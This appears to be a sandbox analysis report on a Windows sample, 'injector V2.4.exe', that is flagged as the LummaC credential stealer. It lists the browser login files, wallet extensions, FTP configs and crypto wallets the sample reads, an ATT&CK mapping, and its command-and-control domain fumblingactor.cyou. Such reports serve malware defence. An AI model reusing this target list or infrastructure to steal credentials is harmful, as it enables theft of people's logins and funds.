Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\injector V2.4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior

Source: Yara match

File source: Process Memory Space: injector V2.4.exe PID: 1492, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: injector V2.4.exe PID: 1492, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
injector V2.4.exe	34%	ReversingLabs	Win32.Trojan.Stealerc
injector V2.4.exe	100%	Avira	HEUR/AGEN.1361736
injector V2.4.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://fumblingactor.cyou/apiY	0%	Avira URL Cloud	safe
https://fumblingactor.cyou/apig	0%	Avira URL Cloud	safe
https://fumblingactor.cyou/apiM	0%	Avira URL Cloud	safe
https://fumblingactor.cyou/apik	0%	Avira URL Cloud	safe
https://fumblingactor.cyou:443/apiTlZT	0%	Avira URL Cloud	safe
https://fumblingactor.cyou/s	0%	Avira URL Cloud	safe
fumblingactor.cyou	0%	Avira URL Cloud	safe
https://fumblingactor.cyou:443/api	100%	Avira URL Cloud	malware
https://fumblingactor.cyou/apiq	0%	Avira URL Cloud	safe
https://fumblingactor.cyou/#	0%	Avira URL Cloud	safe
https://fumblingactor.cyou/3	0%	Avira URL Cloud	safe
https://fumblingactor.cyou:443/apiicrosoft	0%	Avira URL Cloud	safe
https://fumblingactor.cyou/	0%	Avira URL Cloud	safe
https://fumblingactor.cyou/api	100%	Avira URL Cloud	malware
https://fumblingactor.cyou/K	0%	Avira URL Cloud	safe
https://fumblingactor.cyou/api;	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fumblingactor.cyou	172.67.219.199	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
peepburry828.sbs	false		high
fumblingactor.cyou	true	Avira URL Cloud: safe	unknown
p10tgrace.sbs	false		high
processhol.sbs	false		high
p3ar11fter.sbs	false		high
https://fumblingactor.cyou/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fumblingactor.cyou/apig	injector V2.4.exe, 00000004.00000003.2253728589.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	injector V2.4.exe	false		high
https://fumblingactor.cyou/s	injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	injector V2.4.exe	false		high
http://ocsp.sectigo.com0	injector V2.4.exe	false		high
https://fumblingactor.cyou/apiY	injector V2.4.exe, 00000004.00000003.2175491953.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fumblingactor.cyou:443/api	injector V2.4.exe, injector V2.4.exe, 00000004.00000002.2254882908.0000000000536000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2203550234.000000000052F000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2182688181.0000000000533000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2241509455.0000000000533000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	injector V2.4.exe	false		high
https://fumblingactor.cyou/apiM	injector V2.4.exe, 00000004.00000003.2241600983.0000000000544000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	injector V2.4.exe	false		high
https://fumblingactor.cyou:443/apiTlZT	injector V2.4.exe, 00000004.00000002.2254923759.0000000000545000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fumblingactor.cyou/apiq	injector V2.4.exe, 00000004.00000003.2253728589.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fumblingactor.cyou/#	injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fumblingactor.cyou/apik	injector V2.4.exe, 00000004.00000003.2150145038.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2147305126.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2145295992.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2152542985.0000000004EF3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	injector V2.4.exe	false		high
https://sectigo.com/CPS0	injector V2.4.exe	false		high
https://fumblingactor.cyou/3	injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fumblingactor.cyou:443/apiicrosoft	injector V2.4.exe, 00000004.00000003.2241509455.0000000000533000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	injector V2.4.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fumblingactor.cyou/	injector V2.4.exe, injector V2.4.exe, 00000004.00000003.2122997963.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2122845833.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2241547764.0000000004EDC000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2123114421.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2182661370.000000000053A000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254179791.0000000004EDC000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fumblingactor.cyou/K	injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
